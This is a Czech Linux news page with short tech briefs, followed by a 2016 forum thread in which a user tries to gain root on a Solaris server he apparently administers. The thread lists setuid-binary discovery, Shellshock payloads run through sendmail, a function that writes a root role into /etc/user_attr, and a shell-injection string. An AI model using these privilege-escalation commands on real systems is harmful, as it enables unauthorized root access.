Github publikoval Octoverse 2025 (YouTube), tj. každoroční přehled o stavu open source a veřejných softwarových projektů na GitHubu. Každou sekundu se připojil více než jeden nový vývojář. Nejpoužívanějším programovacím jazykem se stal TypeScript.
Kit je nový maskot webového prohlížeče Firefox.
Mastodon (Wikipedie) - sociální síť, která není na prodej - byl vydán ve verzi 4.5. Přehled novinek s náhledy v oznámení na blogu.
Německo zvažuje, že zaplatí místním telekomunikačním operátorům včetně Deutsche Telekom, aby nahradili zařízení od čínské firmy Huawei. Náklady na výměnu by mohly přesáhnout dvě miliardy eur (bezmála 49 miliard Kč). Jeden scénář počítá s tím, že vláda na tento záměr použije prostředky určené na obranu či infrastrukturu.
Po dvaceti letech skončil leader japonské SUMO (SUpport.MOzilla.org) komunity Marsf. Důvodem bylo nasazení sumobota, který nedodržuje nastavené postupy a hrubě zasahuje do překladů i archivů. Marsf zároveň zakázal použití svých příspěvků a dat k učení sumobota a AI a požádal o vyřazení svých dat ze všech učebních dat.
Úřad pro ochranu hospodářské soutěže zahajuje sektorové šetření v oblasti mobilních telekomunikačních služeb poskytovaných domácnostem v České republice. Z poznatků získaných na základě prvotní analýzy provedené ve spolupráci s Českým telekomunikačním úřadem (ČTÚ) ÚOHS zjistil, že vzájemné vztahy mezi operátory je zapotřebí detailněji prověřit kvůli možné nefunkčnosti některých aspektů konkurence na trzích, na nichž roste tržní podíl klíčových hráčů a naopak klesá význam nezávislých virtuálních operátorů.
Různé audity bezpečnostních systémů pařížského muzea Louvre odhalily závažné problémy v oblasti kybernetické bezpečnosti a tyto problémy přetrvávaly déle než deset let. Jeden z těchto auditů, který v roce 2014 provedla francouzská národní agentura pro kybernetickou bezpečnost, například ukázal, že heslo do kamerového systému muzea bylo „Louvre“. 😀
Z upstreamu GNOME Mutter byl zcela odstraněn backend X11. GNOME 50 tedy poběží už pouze nad Waylandem. Aplikace pro X11 budou využívat XWayland.
Byl publikován plán na odstranění XSLT z webových prohlížečů Chrome a Chromium. S odstraněním XSLT souhlasí také vývojáři Firefoxu a WebKit. Důvodem jsou bezpečnostní rizika a klesající využití v moderním webovém vývoji.
Desktopové prostředí LXQt (Lightweight Qt Desktop Environment, Wikipedie) vzniklé sloučením projektů Razor-qt a LXDE bylo vydáno ve verzi 2.3.0. Přehled novinek v poznámkách k vydání.
6.5.2016 09:02
pavlix | skóre: 54
| blog: pavlix
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
$ mojefunkce() {
> usermod -R root user
> }
$ export -f mojefunkce
find / -perm -04000 -o -perm -2000 2>/dev/nullTakto sa dozvies ake mas binarky k dispozicii. A podla toho hladat, ci neexistuje nieco, co malo dieru a da sa exploitnut.
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary
7.5.2016 12:58
localhost; /bin/sh ; , pripadne zistit ci sa nerobi escape cez uvodzovky.
8.5.2016 09:47
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary tak jednoduše nefunguje...
smmsp@solaris11:~$ grep smmsp /etc/passwd smmsp:x:25:25:SendMail Message Submission Program:/: smmsp@solaris11:~$ echo $SHELL /usr/bin/sh
$ injection() {
> echo "user::::type=role" >> /etc/user_attr
> }
$ export -f injection
Teď se snažím z mého shellu spustit další shell pod rootem a z něj pomocí parsovacího bugu spustit funkci, bohužel se mi nedaří:
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail
env asd='() { :;}; injection ' /usr/lib/sendmail
Recipient names must be specified
^C
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail user
env asd='() { :;}; injection ' /usr/lib/sendmail user
nic se nestane...
Kdyby měl někdo nějaký další tip budu moc rád. S přístupem do serverovny se to má prostě tak, že zákazník vyhodil všechny lidi co tam měli povolen přístup a teď už cca půl roku "řeší" jak vyměnit to ILO. Je to prostě klasický bordel, předpokládám že někteří z vás ví očem tady píšu... Hacknout ten server z localhostu je pro mě asi opravdu nejrychlejší řešení. :)
---
To check for the CVE-2014-6271 vulnerability
user@server-to-hack:~$ env var='() { ignore this;}; echo vulnerable' bash -c /bin/true
vulnerable
---
user@server-to-hack:~$ bash --version bash --version GNU bash, version 4.1.11(2)-release (sparc-sun-solaris2.11)---
Publisher: solaris
Version: 0.5.11 (Oracle Solaris 11.1 SRU 1.4)
Build Release: 5.11
Branch: 0.175.1.1.0.4.0
Packaging Date: November 6, 2012 12:13:44 AM
---
user@server-to-hack:~$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
user@server-to-hack:~$ cat echo
Friday, May 13, 2016 03:51:13 PM EEST
-> cd SP/console
/SP/console
-> start
Tiskni
Sdílej:
